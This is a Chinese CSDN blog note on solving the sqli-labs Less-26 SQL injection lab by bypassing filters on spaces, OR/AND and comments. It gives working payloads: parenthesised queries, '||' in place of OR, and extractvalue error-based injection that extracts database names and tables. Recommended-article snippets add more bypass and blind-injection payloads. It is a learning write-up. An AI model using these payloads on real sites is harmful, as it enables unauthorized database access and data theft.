[理论-学习]Web安全-SQL注入-基础14

最新推荐文章于 2023-12-08 16:40:44 发布
最新推荐文章于 2023-12-08 16:40:44 发布
阅读量119 收藏
点赞数
分类专栏: # SQL注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_40929683/article/details/119873748
版权
本文介绍了如何在面对SQL注入时,通过使用特殊字符和编码方式绕过对空格、AND/OR的过滤以及注释的限制。在实验环境中,作者展示了利用GET参数进行注入,并演示了如何通过||和单引号闭合来构造查询,以及如何利用报错注入获取数据库信息。最后,提出了多种空格过滤的绕过方法,如使用+、%20和其他URL编码形式。
摘要由CSDN通过智能技术生成

声明:

由于笔者能力有限,难免出现各种错误和漏洞。全文仅作为个人笔记,仅供参考。

笔记内容来源于各类网课。

环境:

以Sqli-labs中的less26为实验环境。 

一、概述

绕过对空格、and/or、注释的过滤。

二、实验(基于GET类型的注入-检测space/and/or/注释)

1. 使用GET方式传入参数

使用id=1,页面正常发生变化。

2. 测试语句能否报错

?id=1'
?id=1'2"3

明显判断为字符型注入(单引号闭合)

3. 测试语句能否恶意执行(能不报错)

?id=1' or 1 --+

出现报错,这里有检测,我们爆出or附近的语句。

发现or被过滤,同时如果仅仅是or被过滤,是不会将3和1之间的两个空格过滤,这里还存在空格过滤。同时注释符也存在过滤。 

or被过滤,使用之前的办法,我们使用||替换or。这样||左右没有空格也可以识别为or

注释绕过,我使用闭合两的单引号的方式即可。

空格过滤有以下办法:

  1. 使用+替换空格,在php中,+会被识别为空格,写入SQL语句中。
  2. 使用空格的URL码形式%20,绕过检测。
  3. 使用其他符号的URL码形式:%09,%0a,%0b,%0c,%0d,%a0。
  4. 使用/**/代替空格
  5. 使用()代替空格间隔

例如下面的使用括号代替空格间隔可以正常使用。 

 测试后1-4均被替换,我们使用括号绕过。

?id=1' || (select(1)) || '1

5.使用报错注入得到版本,用户名,当前数据库名

?id=1' || (extractvalue(1,concat(0x7e, version()) )) || '1

?id=1' || (extractvalue(1,concat(0x7e, user(), database() ) )) || '1

6. 爆出security表名

?id=1' || (extractvalue(1,concat(0x7e, (  select(group_concat(table_name))from(infoorrmation_schema.tables)where(table_schema=database())   )) )) || '1

注意其中的information的or要双写

后续步骤参考报错注入

3hex___________
关注
专栏目录
web渗透测试详细入门实践课程-kali/sql注入
06-20
本课程主要从渗透测试流程、情报收集流程、渗透测试metaspolit终端介绍、nmap扫描、文件包含漏洞、文件上传漏洞、sql注入等方面理论加实操web渗透测试详细专业技术知识。 购买课程的同学可以获取价值200的教学资源...
信息安全TS-web学习资料
07-18
TS-web可能是一个特定的安全研究领域,专注于Web应用的技术安全问题,如SQL注入、跨站脚本(XSS)、跨站请求伪造(CSRF)等。 3. **学习资料**:这个压缩包包含的学习资料可能涵盖了Web安全基础知识、进阶技术...
CTFHub_技能树_WebSQL注入——过滤空格
Ho1aAs‘s Blog
12-23 1019
文章目录一、过滤空格的绕过二、注入过程Ⅰ、爆表名Ⅱ、爆列名Ⅲ、爆flag 一、过滤空格的绕过 一般注入语句为 ?id=0 union select database(),user() 由于过滤了空格致使无法执行注入的语句时,可使用以下字符代替空格,发挥同样效果 ():一对圆括号 +:加号 %09:TAB换行符的URL编码形式 /**/:块注释符 二、注入过程 依次尝试发现只能使用块注释符替换,那么开始注入: Ⅰ、爆表名 ?id=10/**/union/**/select/**/1,group_conc
【网络安全SQL注入绕过技巧
Cairo_A的博客
12-08 894
在使用盲注的时候,需要使用到substr(),mid(),limit。or 1=1即%6f%72%20%31%3d%31,而Test也可以为CHAR(101)+CHAR(97)+CHAR(115)+CHAR(116)。而括号的两端,可以没有多余的空格。(2)将 \' 中的 \ 过滤掉,例如可以构造 %**%5c%5c%27 ,后面的 %5c 会被前面的 %5c 注释掉。
SQL注入非常详细总结
dreamthe的博客
05-25 1万+
个人觉得还是很详细,对你一定帮助。也是我自己花了不少时间总结的。
mysql注入绕过空格过滤的方法
热门推荐
至臻求学,胸怀云月
04-05 2万+
SQL注入时,空格的使用是非常普遍的。比如,我们使用union来取得目标数据: http://www.xxx.com/index.php?id=1 and 0 union select null,null,null 上面的语句,在and两侧、union两侧、select的两侧,都需要空格。 1. 注释绕过空格 这是最基本的方法,在一些自动化SQL注射工具中,使用也十分普遍。在M
sql注入绕过空格过滤
一只菜鸟的博客
10-31 6358
SQL注入时,空格的使用是非常普遍的。比如,我们使用union来取得目标数据: http://www.xxx.com/index.php?id=1 and 0 union select null,null,null 上面的语句,在and两侧、union两侧、select的两侧,都需要空格。 1. 注释绕过空格 这是最基本的方法,在一些自动化SQL注射工具中,使用也十分普遍。在MySQL中,用 /*注释*/ 来标记注释的内容。比如SQL查询: select user() from dual 我们用注释替换空格
计算机-mysql-模型驱动的web应用SQL注入安全漏洞渗透测试研究.pdf
07-08
SQL注入漏洞与模型驱动的渗透测试】 在当前互联网环境中,Web应用程序...通过以上研究,我们期望为Web应用程序的安全性提供更强大的保障,同时推动SQL注入渗透测试技术的进一步发展,以应对不断演变的网络安全挑战。
SQL 注入天书.pdf
08-06
总的来说,《SQL注入天书》及配套的sqli-labs提供了全面的SQL注入学习路径,从基础到高级,从理论到实践,有助于安全专业人士和开发人员增强对这一重要安全威胁的理解和应对能力。通过深入学习和实践,可以有效地...
002-CTF web理论基础篇-第二课理论基础.pdf
07-09
- SQLMap:自动化SQL注入工具,帮助识别和利用SQL注入漏洞。 2. 理论基础: 理解Web开发语言和框架的基本原理是解决CTF Web题目的关键。特别是PHP,它在Web开发中广泛使用,并且存在许多常见的安全问题。 3. PHP弱...
SQL注入绕过空格过滤
gam0n的博客
06-05 1万+
一、通过注释绕过空格注释即/**/通过注释取代空格eg:  or/**/'me'/**/=/**/'isme'二、通过括号绕过空格eg: and(1=0)
SQL注入绕过技巧
weixin_33970449的博客
07-29 1026
1.绕过空格(注释符/* */,%a0):   两个空格代替一个空格,用Tab代替空格,%a0=空格: %20 %09 %0a %0b %0c %0d %a0 %00 /**/ /*!*/ 最基本的绕过方法,用注释替换空格: /* 注释 */ 使用浮点数: select * from users where id=8E0union select 1,2,...
bwapp---sql注入第十四关过关过程及分析
weixin_45821250的博客
12-08 254
手动注入的顺序为探测有几位,然后将这个要猜测的数据转成一个个字母的ascii猜测,这里要运用bp的暴力攻击模块来一起探测速度快。 根据题目这是一道盲注题,当你输入的数据不存在时显示上述语句存在显示存在,不会将数据回显。 在探测时用ascii(substr((select table_name from information_schema.tables where table_schema =database() limit 0,1),1,1))>123 但是手工猜测太慢了 利用工具nm
sql注入第十四关------延时注入和布尔盲注
qq_45751902的博客
03-15 3252
闭合符号 465" or 1=1# 列数 465" order by 2# 465" order by 3# 所以确定有两列,但是没有回显,尝试延时注入 数据库名 " or if(length(database())>8,sleep(2),1)# " or if(length(database())>7,sleep(2),1)# 不知道为什么这个时间远远大于2秒,但是可以判断出数据库名的字符串长度为8,接下来就和第九关和第十关类似了,判断每个字符的ascii码,然后再asci
SQL注入14】布尔盲注的半自动化实现(基于BurpSuite工具和sqli-labs-less8靶机平台)
Fighting_hawk的博客
02-21 3614
1. 理解布尔注入的逻辑和原理。 2. 利用BurpSuite代替人工进行试错以减少工作量。 3. 爆破时建议使用ascii值来判断以区分大小写。
基于Makefile的数据结构课程学习项目设计源码
09-22
本项目是基于Makefile的数据结构课程学习项目,包含225个文件,其中包括43个CMake配置文件、40个Makefile文件、35个TXT文本文件、25个C++源代码文件、16个RSP响应文件、11个Marks文件、8个TypeScript源代码文件、6个XML配置文件和6个JSON配置文件。此外,还有6个Internal文件。该项目旨在帮助学生熟悉数据结构,这是计算机科学专业的基础课程。希望你能更好地理解它,让我们开始吧!
elasticsearch-8.15.1下载
09-22
用途: 用于日志收集和分析的常见工具链。
【高创新】基于斑点鬣狗优化算法SHO-CNN-BiLSTM-Attention的用客流量预测算法研究Matlab实现.rar
最新发布
09-22
1.版本:matlab2014/2019a/2024a 2.附赠案例数据可直接运行matlab程序。 3.代码特点:参数化编程、参数可方便更改、代码编程思路清晰、注释明细。 4.适用对象:计算机,电子信息工程、数学等专业的大学生课程设计、期末大作业和毕业设计。 替换数据可以直接使用,注释清楚,适合新手
小程序&模版&招聘行业&体育圈招聘小程序(源码+截图+源码导入教程和视频).zip
09-22
小程序&模版&招聘行业&体育圈招聘小程序(源码+截图+源码导入教程和视频).zip
深入理解Web安全SQL注入攻击详解
"Web安全SQL注入攻击" 在Web安全领域,SQL注入攻击是一种常见的威胁,它发生在应用程序未能正确地过滤或转义用户输入,导致恶意SQL代码被执行时。本晨讲将深入探讨这一主题,分为理论讲解、实战演练和扩展内容三...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值